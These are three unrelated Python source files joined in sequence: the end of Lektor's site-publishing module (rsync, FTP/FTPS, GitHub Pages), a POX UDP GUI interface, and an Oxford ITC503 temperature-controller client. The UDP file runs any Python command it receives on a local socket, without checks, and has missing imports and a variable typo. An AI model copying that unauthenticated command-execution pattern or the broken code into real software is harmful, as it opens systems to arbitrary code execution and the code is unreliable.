except (IOError, OSError):
pass
class PublishError(LektorException):
"""Raised by publishers if something goes wrong."""
class Command(object):
def __init__(self, argline, cwd=None, env=None, capture=True, silent=False):
environ = dict(os.environ)
if env:
environ.update(env)
kwargs = {"cwd": cwd, "env": environ}
if silent:
self.devnull = open(os.devnull, "rb+")
kwargs["stdout"] = self.devnull
kwargs["stderr"] = self.devnull
capture = False
if capture:
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
self.capture = capture
self._cmd = portable_popen(argline, **kwargs)
def wait(self):
returncode = self._cmd.wait()
if hasattr(self, "devnull"):
self.devnull.close()
return returncode
@property
def returncode(self):
return self._cmd.returncode
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self._cmd.wait()
def __iter__(self):
if not self.capture:
raise RuntimeError("Not capturing")
# Windows platforms do not have select() for files
if os.name == "nt":
q = queue.Queue()
def reader(stream):
while 1:
line = stream.readline()
q.put(line)
if not line:
break
t1 = threading.Thread(target=reader, args=(self._cmd.stdout,))
t1.setDaemon(True)
t2 = threading.Thread(target=reader, args=(self._cmd.stderr,))
t2.setDaemon(True)
t1.start()
t2.start()
outstanding = 2
while outstanding:
item = q.get()
if not item:
outstanding -= 1
else:
yield item.rstrip().decode("utf-8", "replace")
# Otherwise we can go with select()
else:
streams = [self._cmd.stdout, self._cmd.stderr]
while streams:
for l in select.select(streams, [], streams):
for stream in l:
line = stream.readline()
if not line:
if stream in streams:
streams.remove(stream)
break
yield line.rstrip().decode("utf-8", "replace")
def safe_iter(self):
with self:
for line in self:
yield line
@property
def output(self):
return self.safe_iter()
class Publisher(object):
def __init__(self, env, output_path):
self.env = env
self.output_path = os.path.abspath(output_path)
def fail(self, message):
raise PublishError(message)
def publish(self, target_url, credentials=None, **extra):
raise NotImplementedError()
class RsyncPublisher(Publisher):
def get_command(self, target_url, tempdir, credentials):
credentials = credentials or {}
argline = ["rsync", "-rclzv", "--exclude=.lektor"]
target = []
env = {}
options = target_url.decode_query()
exclude = options.getlist("exclude")
for file in exclude:
argline.extend(("--exclude", file))
delete = options.get("delete", False) in ("", "on", "yes", "true", "1", None)
if delete:
argline.append("--delete-delay")
keyfile = _write_ssh_key_file(
os.path.join(tempdir, "ssh-auth-key"), credentials
)
if target_url.port is not None or keyfile is not None:
argline.append("-e")
argline.append(_get_ssh_cmd(target_url.port, keyfile))
username = credentials.get("username") or target_url.username
if username:
target.append(username + "@")
if target_url.ascii_host is not None:
target.append(target_url.ascii_host)
target.append(":")
target.append(target_url.path.rstrip("/") + "/")
argline.append(self.output_path.rstrip("/\\") + "/")
argline.append("".join(target))
return Command(argline, env=env)
def publish(self, target_url, credentials=None, **extra):
with _temporary_folder(self.env) as tempdir:
client = self.get_command(target_url, tempdir, credentials)
with client:
for line in client:
yield line
class FtpConnection(object):
def __init__(self, url, credentials=None):
credentials = credentials or {}
self.con = self.make_connection()
self.url = url
self.username = credentials.get("username") or url.username
self.password = credentials.get("password") or url.password
self.log_buffer = []
self._known_folders = set()
def make_connection(self):
from ftplib import FTP
return FTP()
def drain_log(self):
log = self.log_buffer[:]
del self.log_buffer[:]
for chunk in log:
for line in chunk.splitlines():
if not isinstance(line, text_type):
line = line.decode("utf-8", "replace")
yield line.rstrip()
def connect(self):
options = self.url.decode_query()
log = self.log_buffer
log.append("000 Connecting to server ...")
try:
log.append(self.con.connect(self.url.ascii_host, self.url.port or 21))
except Exception as e:
log.append("000 Could not connect.")
log.append(str(e))
return False
try:
credentials = {}
if PY2:
if self.username:
credentials["user"] = self.username.encode("utf-8")
if self.password:
credentials["passwd"] = self.password.encode("utf-8")
else:
if self.username:
credentials["user"] = self.username
if self.password:
credentials["passwd"] = self.password
log.append(self.con.login(**credentials))
except Exception as e:
log.append("000 Could not authenticate.")
log.append(str(e))
return False
passive = options.get("passive") in ("on", "yes", "true", "1", None)
log.append("000 Using passive mode: %s" % (passive and "yes" or "no"))
self.con.set_pasv(passive)
try:
log.append(self.con.cwd(self.url.path))
except Exception as e:
log.append(str(e))
return False
log.append("000 Connected!")
return True
def mkdir(self, path, recursive=True):
if not isinstance(path, text_type):
path = path.decode("utf-8")
if path in self._known_folders:
return
dirname, basename = posixpath.split(path)
if dirname and recursive:
self.mkdir(dirname)
try:
self.con.mkd(path)
except FTPError as e:
msg = str(e)
if msg[:4] != "550 ":
self.log_buffer.append(str(e))
return
self._known_folders.add(path)
def append(self, filename, data):
if not isinstance(filename, text_type):
filename = filename.decode("utf-8")
if PY2:
input = StringIO(data)
else:
input = BytesIO(data.encode("utf-8"))
try:
self.con.storbinary("APPE " + filename, input)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def get_file(self, filename, out=None):
if not isinstance(filename, text_type):
filename = filename.decode("utf-8")
getvalue = False
if out is None:
if PY2:
out = StringIO()
else:
out = BytesIO()
getvalue = True
try:
self.con.retrbinary("RETR " + filename, out.write)
except FTPError as e:
msg = str(e)
if msg[:4] != "550 ":
self.log_buffer.append(e)
return None
if getvalue:
if PY2:
return out.getvalue()
return out.getvalue().decode("utf-8")
return out
def upload_file(self, filename, src, mkdir=False):
if isinstance(src, string_types):
if PY2:
src = StringIO(src)
else:
src = BytesIO(src.encode("utf-8"))
if mkdir:
directory = posixpath.dirname(filename)
if directory:
self.mkdir(directory, recursive=True)
if not isinstance(filename, text_type):
filename = filename.decode("utf-8")
try:
self.con.storbinary("STOR " + filename, src, blocksize=32768)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def rename_file(self, src, dst):
try:
self.con.rename(src, dst)
except FTPError as e:
self.log_buffer.append(str(e))
try:
self.con.delete(dst)
except Exception as e:
self.log_buffer.append(str(e))
try:
self.con.rename(src, dst)
except Exception as e:
self.log_buffer.append(str(e))
def delete_file(self, filename):
if isinstance(filename, text_type):
filename = filename.encode("utf-8")
try:
self.con.delete(filename)
except Exception as e:
self.log_buffer.append(str(e))
def delete_folder(self, filename):
if isinstance(filename, text_type):
filename = filename.encode("utf-8")
try:
self.con.rmd(filename)
except Exception as e:
self.log_buffer.append(str(e))
self._known_folders.discard(filename)
class FtpTlsConnection(FtpConnection):
def make_connection(self):
from ftplib import FTP_TLS
return FTP_TLS()
def connect(self):
connected = super(FtpTlsConnection, self).connect()
if connected:
# Upgrade data connection to TLS.
self.con.prot_p() # pylint: disable=no-member
return connected
class FtpPublisher(Publisher):
connection_class = FtpConnection
def read_existing_artifacts(self, con):
contents = con.get_file(".lektor/listing")
if not contents:
return {}, set()
duplicates = set()
rv = {}
# Later records override earlier ones. There can be duplicate
# entries if the file was not compressed.
for line in contents.splitlines():
items = line.split("|")
if len(items) == 2:
if not isinstance(items[0], text_type):
artifact_name = items[0].decode("utf-8")
else:
artifact_name = items[0]
if artifact_name in rv:
duplicates.add(artifact_name)
rv[artifact_name] = items[1]
return rv, duplicates
def iter_artifacts(self):
"""Iterates over all artifacts in the build folder and yields the
artifacts.
"""
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if not self.env.is_ignored_artifact(x)]
for filename in filenames:
if self.env.is_ignored_artifact(filename):
continue
full_path = os.path.join(self.output_path, dirpath, filename)
local_path = full_path[len(self.output_path) :].lstrip(os.path.sep)
if os.path.altsep:
local_path = local_path.lstrip(os.path.altsep)
h = hashlib.sha1()
try:
with open(full_path, "rb") as f:
while 1:
item = f.read(4096)
if not item:
break
h.update(item)
except IOError as e:
if e.errno != errno.ENOENT:
raise
yield (
local_path.replace(os.path.sep, "/"),
full_path,
h.hexdigest(),
)
def get_temp_filename(self, filename):
dirname, basename = posixpath.split(filename)
return posixpath.join(dirname, "." + basename + ".tmp")
def upload_artifact(self, con, artifact_name, source_file, checksum):
with open(source_file, "rb") as source:
tmp_dst = self.get_temp_filename(artifact_name)
con.log_buffer.append("000 Updating %s" % artifact_name)
con.upload_file(tmp_dst, source, mkdir=True)
con.rename_file(tmp_dst, artifact_name)
con.append(".lektor/listing", "%s|%s\n" % (artifact_name, checksum))
def consolidate_listing(self, con, current_artifacts):
server_artifacts, duplicates = self.read_existing_artifacts(con)
known_folders = set()
for artifact_name in iterkeys(current_artifacts):
known_folders.add(posixpath.dirname(artifact_name))
for artifact_name, checksum in iteritems(server_artifacts):
if artifact_name not in current_artifacts:
con.log_buffer.append("000 Deleting %s" % artifact_name)
con.delete_file(artifact_name)
folder = posixpath.dirname(artifact_name)
if folder not in known_folders:
con.log_buffer.append("000 Deleting %s" % folder)
con.delete_folder(folder)
if duplicates or server_artifacts != current_artifacts:
listing = []
for artifact_name, checksum in iteritems(current_artifacts):
listing.append("%s|%s\n" % (artifact_name, checksum))
listing.sort()
con.upload_file(".lektor/.listing.tmp", "".join(listing))
con.rename_file(".lektor/.listing.tmp", ".lektor/listing")
def publish(self, target_url, credentials=None, **extra):
con = self.connection_class(target_url, credentials)
connected = con.connect()
for event in con.drain_log():
yield event
if not connected:
return
yield "000 Reading server state ..."
con.mkdir(".lektor")
committed_artifacts, _ = self.read_existing_artifacts(con)
for event in con.drain_log():
yield event
yield "000 Begin sync ..."
current_artifacts = {}
for artifact_name, filename, checksum in self.iter_artifacts():
current_artifacts[artifact_name] = checksum
if checksum != committed_artifacts.get(artifact_name):
self.upload_artifact(con, artifact_name, filename, checksum)
for event in con.drain_log():
yield event
yield "000 Sync done!"
yield "000 Consolidating server state ..."
self.consolidate_listing(con, current_artifacts)
for event in con.drain_log():
yield event
yield "000 All done!"
class FtpTlsPublisher(FtpPublisher):
connection_class = FtpTlsConnection
class GithubPagesPublisher(Publisher):
def get_credentials(self, url, credentials=None):
credentials = credentials or {}
username = credentials.get("username") or url.username
password = credentials.get("password") or url.password
rv = username
if username and password:
rv += ":" + password
return rv if rv else None
def update_git_config(self, repo, url, branch, credentials=None):
ssh_command = None
path = url.host + u"/" + url.path.strip(u"/")
cred = None
if url.scheme in ("ghpages", "ghpages+ssh"):
push_url = "git@github.com:%s.git" % path
keyfile = _write_ssh_key_file(
os.path.join(repo, ".git", "ssh-auth-key"), credentials
)
if keyfile or url.port:
ssh_command = _get_ssh_cmd(url.port, keyfile)
else:
push_url = "https://github.com/%s.git" % path
cred = self.get_credentials(url, credentials)
with open(os.path.join(repo, ".git", "config"), "a") as f:
f.write(
'[remote "origin"]\nurl = %s\n'
"fetch = +refs/heads/%s:refs/remotes/origin/%s\n"
% (push_url, branch, branch)
)
if cred:
cred_path = os.path.join(repo, ".git", "credentials")
f.write('[credential]\nhelper = store --file "%s"\n' % cred_path)
with open(cred_path, "w") as cf:
cf.write("https://%s@github.com\n" % cred)
return ssh_command
def link_artifacts(self, path):
try:
link = os.link
except AttributeError:
link = shutil.copy
# Clean old
for filename in os.listdir(path):
if filename == ".git":
continue
filename = os.path.join(path, filename)
try:
os.remove(filename)
except OSError:
shutil.rmtree(filename)
# Add new
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if x != ".lektor"]
for filename in filenames:
full_path = os.path.join(self.output_path, dirpath, filename)
dst = os.path.join(
path,
full_path[len(self.output_path) :]
.lstrip(os.path.sep)
.lstrip(os.path.altsep or ""),
)
try:
os.makedirs(os.path.dirname(dst))
except (OSError, IOError):
pass
try:
link(full_path, dst)
except OSError: # Different Filesystems
shutil.copy(full_path, dst)
def write_cname(self, path, target_url):
params = target_url.decode_query()
cname = params.get("cname")
if cname is not None:
with open(os.path.join(path, "CNAME"), "w") as f:
f.write("%s\n" % cname)
def detect_target_branch(self, target_url):
# When pushing to the username.github.io repo we need to push to
# master, otherwise to gh-pages
if target_url.host.lower() + ".github.io" == target_url.path.strip("/").lower():
branch = "master"
else:
branch = "gh-pages"
return branch
def publish(self, target_url, credentials=None, **extra):
if not locate_executable("git"):
self.fail("git executable not found; cannot deploy.")
branch = self.detect_target_branch(target_url)
with _temporary_folder(self.env) as path:
ssh_command = None
def git(args, **kwargs):
kwargs["env"] = _patch_git_env(kwargs.pop("env", None), ssh_command)
return Command(["git"] + args, cwd=path, **kwargs)
for line in git(["init"]).output:
yield line
ssh_command = self.update_git_config(path, target_url, branch, credentials)
for line in git(["remote", "update"]).output:
yield line
if git(["checkout", "-q", branch], silent=True).wait() != 0:
git(["checkout", "-qb", branch], silent=True).wait()
self.link_artifacts(path)
self.write_cname(path, target_url)
for line in git(["add", "-f", "--all", "."]).output:
yield line
for line in git(["commit", "-qm", "Synchronized build"]).output:
yield line
for line in git(["push", "origin", branch]).output:
yield line
builtin_publishers = {
"rsync": RsyncPublisher,
"ftp": FtpPublisher,
"ftps": FtpTlsPublisher,
"ghpages": GithubPagesPublisher,
"ghpages+https": GithubPagesPublisher,
"ghpages+ssh": GithubPagesPublisher,
}
def publish(env, target, output_path, credentials=None, **extra):
url = urls.url_parse(text_type(target))
publisher = env.publishers.get(url.scheme)
if publisher is None:
raise PublishError('"%s" is an unknown scheme.' % url.scheme)
return publisher(env, output_path).publish(url, credentials, **extra)
|
comm_udp.py
|
"""
This is the communication interface for working with the NOX-derived GUI.
It may need a little love to work again, but it'd probably be a better
idea to adapt the NOX-derived GUI to use the newer TCP stream interface
instead, as it has many advantages.
"""
import comm
import socket
import json
class GuiInterface(comm.NullInterface):
def __init__ (self):
self.recv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.recv.bind(("127.0.0.1", 4445))
self.thread = threading.Thread(target = self._recvLoop)
self.thread.daemon = True
self.thread.start()
def _recvLoop (self):
import select
while True:
(rx, tx, xx) = select.select([self.recv], [], [])
if len(rx):
d = self.recv.recv(4096)
try:
world.doLater(0, self.handle_recv, json.loads(d))
except:
traceback.print_exc()
def handle_recv (self, data):
import basics
if data['type'] == "ping":
src = getattr(sim, data['src'])
dst = getattr(sim, data['dst'])
src.send(basics.Ping(dst), flood=True)
elif data['type'] == "console":
# Execute python command, return output to GUI
#print "Got command:", data['command']
r = interp.runsource(data['command'], "<gui>")
if r:
events.send_console_more(data['command'])
def sendToGui(self, dict_msg):
sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
sock.sendto( json.dumps(dict_msg), ("127.0.0.1", 4444) )
def send_console(self, text):
self.sendToGui({'type':'console','msg':text})
def send_console_more(self, text):
self.sendToGui({'type':'console_more','command':text})
def send_log(self, record):
self.sendToGui(record)
def send_entity_up(self, name, kind):
#print name
msg = {}
msg['type'] = 'topology'
msg['command'] = 'add'
msg['node_type'] = kind
msg['node_id'] = name
self.sendToGui(msg)
def send_link_up(self, srcid, sport, dstid, dport):
msg = {}
links = [
{'src port': sport,
'src id': srcid,
'dst id': dstid,
'src type': 'switch',
'dst type': 'switch',
'dst port': dport}]
msg['type'] = 'topology'
msg['command'] = 'add'
msg['links'] = links
self.sendToGui(msg)
def send_link_down(self, srcid, sport, dstid, dport):
msg = {}
links = [
{'src port': sport,
'src id': srcid,
'dst id': distid,
'src type': 'switch',
'dst type': 'switch',
'dst port': dport}]
msg['type'] = 'topology'
msg['command'] = 'remove'
msg['links'] = links
self.sendToGui(msg)
def highlight_path (self, nodes):
""" Sends a path to the GUI to be highlighted """
nodes = [n.name for n in nodes]
msg = {'type':'highlight', 'nodes':nodes}
self.sendToGui(msg)
def set_debug(self, nodeid, msg):
msg = {
'type' : 'debug',
'node_id' : nodeid,
'msg': msg,
}
self.sendToGui(msg)
interface = GuiInterface
|
ITC503_ControlClient.py
|
"""Module containing a class to run a (Oxford Instruments) ITC 503 Intelligent Temperature Controller in a pyqt5 application
Classes:
ITC_Updater: a class for interfacing with a ITC 503 Temperature Controller
inherits from AbstractLoopThread
there, the looping behaviour of this thread is defined
Author(s):
bklebel (Benjamin Klebel)
"""
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# to be removed once this is packaged!
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtCore import QSettings
from PyQt5 import QtWidgets
# import json
# import sys
from threading import Lock
from threading import Thread
import time
import numpy as np
from copy import deepcopy
import logging
from util import ExceptionHandling
from util import AbstractLoopThreadClient
from util import Window_trayService_ui
from util import readPID_fromFile
from util import AbstractMainApp
# from zmqcomms import dec, enc
from datetime import datetime
from Oxford import itc503
from drivers import ApplicationExit
from pyvisa.errors import VisaIOError
class ITC503_ControlClient(AbstractLoopThreadClient):
"""Control class to update all instrument data of the Intelligent Temperature Controller (ITC) 503.
For each ITC503 function (except collecting data), there is a wrapping method,
which we can call by a signal, from the main thread. This wrapper sends
the corresponding value to the device.
There is a second method for all wrappers, which accepts
the corresponding value, and stores it, so it can be sent upon acknowledgment
The information from the device is collected in regular intervals (method "running"),
and subsequently sent to the main thread. It is packed in a dict,
the keys of which are displayed in the "sensors" dict in this class.
"""
# exposable data dictionary
data = {}
sensors = dict(
set_temperature=0,
Sensor_1_K=1,
Sensor_2_K=2,
Sensor_3_K=3,
temperature_error=4,
heater_output_as_percent=5,
heater_output_as_voltage=6,
gas_flow_output=7,
proportional_band=8,
integral_action_time=9,
derivative_action_time=10,
)
def __init__(self, mainthread=None, InstrumentAddress="", **kwargs):
super().__init__(**kwargs)
# self.logger = log if log else logging.getLogger(__name__)
# here the class instance of the LakeShore should be handed
self.__name__ = "ITC_control " + InstrumentAddress
self._logger = logging.getLogger(
"CryoGUI." + __name__ + "." + self.__class__.__name__
)
self.interval = 1.7
# -------------------------------------------------------------------------------------------------------------------------
# Interface with hardware device
self.ITC = itc503(InstrumentAddress=InstrumentAddress)
# -------------------------------------------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------------------------------------------
# initial configurations for the hardware device
self.control_state = 3
self.set_temperature = 0
self.set_prop = 0
self.set_integral = 0
self.set_derivative = 0
self.set_sensor = 1
self.set_heater_output = 0
self.set_gas_output = 0
self.set_auto_manual = 0
self.sweep_parameters = None
self.sweep_running = False
self.sweep_running_device = False
self.checksweep(stop=False)
self.sweep_ramp = 0
self.sweep_first = False
self.setControl()
self.setPIDFile(".\\..\\configurations\\PID_conf\\P1C1.conf")
self.useAutoPID = True
if mainthread is not None:
mainthread.sig_useAutocheck.connect(self.setCheckAutoPID)
mainthread.sig_newFilePID.connect(self.setPIDFile)
mainthread.sig_sendConfTemp.connect(self.setTemperature)
mainthread.sig_stopSweep.connect(self.stopSweep)
self.data_last = {}
self.lock_newthread = Lock()
# -------------------------------------------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------------------------------------------
# def change_gas(self):
# """to be worked in a separate worker thread (separate
# time.sleep() from GUI)
# change the opening percentage of the needle valve in a
# repeatable fashion (go to zero, go to new value)
# disable the GUI element during the operation
# should be changed, to use signals to change GUI,
# and possibly timers instead of time.sleep()
# (QTimer not usefil in the second case)
# """
# if self.ITC_window.checkGas_gothroughzero.isChecked():
# gas_new = self.threads['control_ITC'][0].set_gas_output
# with self.dataLock:
# gas_old = int(self.data['ITC']['gas_flow_output'])
# if gas_new == 0:
# time_wait = 60 / 1e2 * gas_old + 5
# self.threads['control_ITC'][0].setGasOutput()
# self.ITC_window.spinsetGasOutput.setEnabled(False)
# time.sleep(time_wait)
# self.ITC_window.spinsetGasOutput.setEnabled(True)
# else:
# time1 = 60 / 1e2 * gas_old + 5
# time2 = 60 / 1e2 * gas_new + 5
# self.threads['control_ITC'][
# 0].gettoset_GasOutput(0)
# self.threads['control_ITC'][0].setGasOutput()
# self.ITC_window.spinsetGasOutput.setEnabled(False)
# time.sleep(time1)
# self.threads['control_ITC'][
# 0].gettoset_GasOutput(gas_new)
# self.threads['control_ITC'][0].setGasOutput()
# time.sleep(time2)
# self.ITC_window.spinsetGasOutput.setEnabled(True)
# else:
# self.threads['control_ITC'][0].setGasOutput()
mainthread.spinsetGasOutput.valueChanged.connect(self.gettoset_GasOutput)
mainthread.spinsetGasOutput.editingFinished.connect(self.setGasOutput)
mainthread.spinsetHeaterPercent.valueChanged.connect(self.gettoset_HeaterOutput)
mainthread.spinsetHeaterPercent.editingFinished.connect(self.setHeaterOutput)
mainthread.spinsetProportionalID.valueChanged.connect(
self.gettoset_Proportional
)
mainthread.spinsetProportionalID.editingFinished.connect(self.setProportional)
mainthread.spinsetPIntegrationD.valueChanged.connect(self.gettoset_Integral)
mainthread.spinsetPIntegrationD.editingFinished.connect(self.setIntegral)
mainthread.spinsetPIDerivative.valueChanged.connect(self.gettoset_Derivative)
mainthread.spinsetPIDerivative.editingFinished.connect(self.setDerivative)
mainthread.combosetHeatersens.activated["int"].connect(
lambda value: self.setHeaterSensor(value + 1)
)
mainthread.combosetAutocontrol.activated["int"].connect(self.setAutoControl)
# -------------------------------------------------------------------------------------------------------------------------
mainthread.spin_threadinterval.valueChanged.connect(self.setInterval)
# @control_checks
@ExceptionHandling
def running(self):
"""
Try to extract all current data from LakeShore350,
and emit signal, sending the data
"""
# print('run')
self.run_finished = False
# -------------------------------------------------------------------------------------------------------------------------
# data collection for to be exposed on the data upstream
# to be stored in self.data
# self.data['status'] = self.read_status()
self.data["temperature_error"] = self.ITC.getValue(
self.sensors["temperature_error"]
)
self.data["set_temperature"] = self.ITC.getValue(
self.sensors["set_temperature"]
)
for key in self.sensors:
try:
value = self.ITC.getValue(self.sensors[key])
self.data[key] = value
self.data_last[key] = value
except AssertionError as e_ass:
self.sig_assertion.emit(e_ass.args[0])
self._logger.exception(e_ass)
self.data[key] = None
except VisaIOError as e_visa:
if (
isinstance(e_visa, type(self.timeouterror))
and e_visa.args == self.timeouterror.args
):
self.sig_visatimeout.emit()
self.ITC.clear_buffers()
self.data[key] = None
else:
# raise e_visa
self._logger.exception(e_visa)
self.sig_visaerror.emit(e_visa.args[0])
# print('retrieving', time.time()-starttime, self.data['Sensor_1_K'])
# with "calc" in name it would not enter calculations!
self.data["Sensor_1_calerr_K"] = (
self.data["set_temperature"] - self.data["temperature_error"]
)
self.data_last["status"] = self.read_status()
self.data_last["sweep"] = self.checksweep(stop=False)
self.data["autocontrol"] = int(self.data_last["status"]["auto_int"])
if self.useAutoPID:
self.set_PID(temperature=self.data["Sensor_1_K"])
self.data["realtime"] = datetime.now()
# -------------------------------------------------------------------------------------------------------------------------
self.sig_Infodata.emit(deepcopy(self.data))
self.run_finished = True
@ExceptionHandling
def act_on_command(self, command):
"""execute commands sent on downstream"""
pass
# -------------------------------------------------------------------------------------------------------------------------
# commands, like for adjusting a set temperature on the device
# commands are received via zmq downstream, and executed here
# examples:
if "setTemp_K" in command:
# value in this dictionary must the the required dictionary!
self.setTemperature(command["setTemp_K"])
# if 'configTempLimit' in command:
# self.configTempLimit(command['configTempLimit'])
if "setInterval" in command:
self.setInterval(command["setInterval"])
if "setDerivative" in command:
self.gettoset_Derivative(command["setDerivative"])
self.setDerivative()
if "setIntegral" in command:
self.gettoset_Integral(command["setIntegral"])
self.setIntegral()
if "setProportional" in command:
self.gettoset_Proportional(command["setProportional"])
self.setProportional()
if "setHeaterOutput" in command:
self.gettoset_HeaterOutput(command["setHeaterOutput"])
self.setHeaterOutput()
if "setGasOutput" in command:
self.gettoset_GasOutput(command["setGasOutput"])
self.setGasOutput()
if "gothroughzero" in command:
self._logger.warning(
"go through zero not implemented, command %s has been ignored"
% command["gothroughzero"]
)
"""Has to be implemented"""
if "setAutoControl" in command:
self.setAutoControl(command["setAutoControl"])
if "setHeaterSensor" in command:
self.setHeaterSensor(command["commsetHeaterSensor"])
if "ConfloaD" in command:
self.setPIDFile(command["PIDFile"])
self.setCheckAutoPID(command["useAuto"])
if command["useAuto"] == 1:
self.set_PID(temperature=self.data["Sensor_1_K"])
# -------------------------------------------------------------------------------------------------------------------------
@ExceptionHandling
def query_on_command(self, command):
"""execute commands sent via tcp"""
answer_dict = {}
# -------------------------------------------------------------------------------------------------------------------------
# commands, like for adjusting a set temperature on the device
# commands are received via zmq tcp, and executed here
if "measure_Sensor_K" in command: # value could be the sensor number
answer_dict["Temperature_K"] = self.ITC.getValue(self.sensors["Sensor_1_K"])
self.act_on_command(command)
answer_dict["OK"] = True
return answer_dict
# -------------------------------------------------------------------------------------------------------------------------
@ExceptionHandling
def setCheckAutoPID(self, boolean):
"""reaction to signal: set AutoPID behaviour"""
self.useAutoPID = boolean
@ExceptionHandling
def setPIDFile(self, file):
"""reaction to signal: set AutoPID lookup file"""
self.PIDFile = file
self.PID_configuration = readPID_fromFile(self.PIDFile)
@ExceptionHandling
def read_status(self, run=True):
"""read the device status"""
self.device_status = self.ITC.getStatus(run)
return self.device_status
# @pyqtSlot(int)
# def set_delay_sending(self, delay):
# self.ITC.set_delay_measuring(delay)
@ExceptionHandling
def set_PID(self, temperature):
"""set the PID values acorrding to the configuration
configuration should be stored in self.PID_configuration:
a tuple, with
the first entry being a list of temperatures
the second entry being a list of dicts with p, i, d values"""
try:
PID_id = np.where(self.PID_configuration[0] > temperature)[0][0]
except IndexError:
PID_id = -1
PID_conf = self.PID_configuration[1][PID_id]
self.set_prop = PID_conf["p"]
self.set_integral = PID_conf["i"]
self.set_derivative = PID_conf["d"]
self.setProportional()
self.setIntegral()
self.setDerivative()
# def startSweep(self, d):
# with self.lock:
# self.setSweep(setpoint_temp=d['end'],
# rate=d['SweepRate'],
# start=d['start'])
# self.ITC.SweepStart()
# self.ITC.getValue(0) # whatever this is needed for
@ExceptionHandling
def stopSweep(self):
# with self.lock:
self.setSweep(setpoint_temp=self.ITC.getValue(0), rate=50, start=False)
time.sleep(0.1)
self.ITC.SweepJumpToLast()
time.sleep(0.1)
@pyqtSlot()
@ExceptionHandling
def setSweep(self, setpoint_temp, rate, start=False):
# with self.lock:
if start:
setpoint_now = start
else:
setpoint_now = self.ITC.getValue(0)
# print('setpoint now = ', setpoint_now)
if rate == 0:
n_sweeps = 0
sweep_times = [0.1]
sweep_temps = [setpoint_temp]
# print('rate was zero!')
else:
delta_Temperature = setpoint_temp - setpoint_now
sweep_time = abs(delta_Temperature) / rate
if sweep_time < 0.1:
# print('sweeptime below 0.1: ', sweep_time)
sweep_time = 0.1
if sweep_time > 20e3:
raise AssertionError(
"A sweep can be maximal 15 * 23h long (about 20 000 minutes, about 205K at 0.01 K/min)!"
)
if sweep_time > 23.5 * 60:
# not only one step suffices, as the maximum time for one step
# is 24 hours (using 23.5 for safety)
# calculate number of full steps
n_sweeps = int(sweep_time / (23 * 60))
# calculate remaining time in minutes
remaining_min = sweep_time - n_sweeps * 23 * 60
# make list with full sweep times
sweep_times = [23 * 60 for n in range(n_sweeps)]
# make list with full sweep temps
sweep_temps = [
setpoint_now + delta_Temperature * 23 * 60 / sweep_time * (n + 1)
for n in range(n_sweeps)
]
if not np.isclose(0, remaining_min):
# append remaining times and temps in case the user
# did not hit a mark
sweep_times += [remaining_min]
sweep_temps += [setpoint_temp]
else:
n_sweeps = 0
sweep_times = [sweep_time]
sweep_temps = [setpoint_temp]
sp = {
str(z): dict(set_point=setpoint_temp, hold_time=0, sweep_time=0)
for z in range(1, 17)
}
sp.update(
{
str(1): dict(set_point=setpoint_now, hold_time=0, sweep_time=0),
# str(2): dict(set_point=setpoint_temp,
# hold_time=0,
# sweep_time=sweep_time),
# str(15): dict(set_point=setpoint_temp,
# hold_time=0,
# sweep_time=0),
str(16): dict(set_point=setpoint_temp, hold_time=0, sweep_time=0.1),
}
)
# fill up the steps
sp.update(
{
str(z + 2): dict(
set_point=sweep_temps[z], hold_time=0, sweep_time=sweep_times[z]
)
for z in range(n_sweeps + 1)
}
)
self.sweep_parameters = sp
# print('setting sweep to', self.sweep_parameters)
self.ITC.setSweeps(self.sweep_parameters)
# self.ITC.getValue(0)
# print('sweep table read from device:')
# for x in self.ITC.readSweepTable():
# print(x)
# @pyqtSlot(bool)
# @ExceptionHandling
# def setSweepStatus(self, bools):
# self.sweep_running = bools
# # print('set sweep status to', bools)
# with self.lock:
# # print('sweepstatus: I locked the thread!')
# if not bools:
# # print('sweepstatus: stopping the sweep')
# self.checksweep()
# self.ITC.setTemperature(self.set_temperature)
# # print('sweepstatus: I unlocked the device')
# # if bools:
# # print('set the sweep status: ', bools)
# # print('sweepstatus: set the temperature')
# # self.setTemperature()
# @pyqtSlot(float)
# @ExceptionHandling
# def gettoset_sweepRamp(self, value):
# self.sweep_ramp = value
# # print('set sweep ramp to', value)
@ExceptionHandling
def checksweep(self, stop=True):
# print('checking sweep')
status = self.read_status(run=False)
# print(status)
try:
int(status["sweep"])
status["sweep"] = bool(int(status["sweep"]))
except ValueError:
status["sweep"] = True
# print('sweep status: ', status['sweep'])
self.sweep_running_device = status["sweep"]
if stop and status["sweep"]:
# print('setTemp: sweep running, stopping sweep')
self.stopSweep()
return self.sweep_running_device
# else:
# print('I did not see a running sweep!',
# self.device_status['sweep'])
# print('sweep was/is running: ', self.device_status['sweep'])
@pyqtSlot(dict)
@ExceptionHandling
def setTemperature(self, values):
"""set Temperature of the instrument
dict(isSweep=isSweep,
isSweepStartCurrent=isSweepStartCurrent,
setTemp=setTemp,
start=start,
end=end,
SweepRate=SweepRate)
"""
values["self"] = self
def settingtheTemp(values):
instance = values["self"]
# stop sweep if it runs
if "start" in values:
starting = values["start"]
else:
starting = instance.ITC.getValue(0)
start = (
instance.ITC.getValue(0) if values["isSweepStartCurrent"] else starting
)
instance.checksweep(stop=True)
autocontrol = instance.data_last["status"]["auto_int"]
instance.ITC.setAutoControl(0)
while instance.data_last["sweep"]:
time.sleep(0.01)
time.sleep(0.1)
# print('sleeping')
with instance.lock:
if values["isSweep"]:
# set up sweep
instance.setSweep(
setpoint_temp=values["end"],
rate=values["SweepRate"],
start=start,
)
instance.ITC.SweepStart()
# whatever this is needed for, does not work without
instance.ITC.getValue(0)
else:
instance.ITC.setTemperature(values["setTemp"])
instance.ITC.setAutoControl(autocontrol)
with self.lock_newthread:
t1 = Thread(target=settingtheTemp, args=(values,))
t1.start()
# with self.lock:
# self.checksweep()
# if not self.sweep_running:
